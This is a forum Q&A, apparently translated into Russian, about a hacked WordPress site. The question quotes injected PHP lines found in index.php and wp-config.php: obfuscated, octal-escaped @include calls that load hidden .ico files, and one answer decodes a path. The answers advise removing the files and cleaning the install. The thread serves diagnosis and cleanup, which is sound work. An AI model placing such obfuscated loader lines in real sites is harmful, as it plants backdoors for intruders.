Чужой код появляется в WordPress критических файлах установки

Question

С 4 дней назад до настоящего времени на моем веб-сайте автоматически генерировался код, работающий с Wordpress в качестве CMS.

Код, который был сгенерирован внутри index.php файла:

/*12a36*/

@include "\057home\057ippl\145ir/p\165blic\137html\057blog\057wp-i\156clud\145s/ce\162tifi\143ates\057.3b4\141428f\056ico";

/*12a36*/

И код, сгенерированный внутри wp-config файла:

/*e2db6*/

@include "\057h\157m\145/\151p\160l\145i\162/\160u\142l\151c\137h\164m\154/\167p\055i\156c\154u\144e\163/\122e\161u\145s\164s\057R\145s\160o\156s\145/\0563\1455\065f\070d\062.\151c\157";

/*e2db6*/

Сайт сообщает об ошибке 404. Мне нужен совет / помощь относительно того, как я могу решить эту проблему.

когда этот код сгенерирован внутри этих файлов index.php и wp-config, мой сервер автоматически удалил файл index.php.

Также в качестве дополнительной информации - я использую плагин безопасности i-theme.

Answer 1

Ваш сайт, вероятно, был взломан / причинен вредоносным ПО / вирусом.

Код указывает на путь:

/home/ippleir/public_html/blog/wp-includes/certificates/.3b4a428f.ico

Вы должны очистить все существующие установки.на том же сервере.

Начните с удаления включенного файла / каталогов, а затем Вы можете следовать многим указаниям в Интернете или моему старому ответу здесь, на SO

Answer 2

Это просто означает, что ваш сайт взломан, возможно, из-за недооцененных или устаревших плагинов, вы должны вручную очистить свой сайт и обновить плагины и ядро ​​WordPress.

Вы можете использовать сканирование сайтов в режиме онлайн, чтобы гарантировать атаки [https://sitecheck.sucuri.net/],. Также может существовать файл [php] с инопланетянами, который будет действовать как бэкдор, проверьте файлы вручную.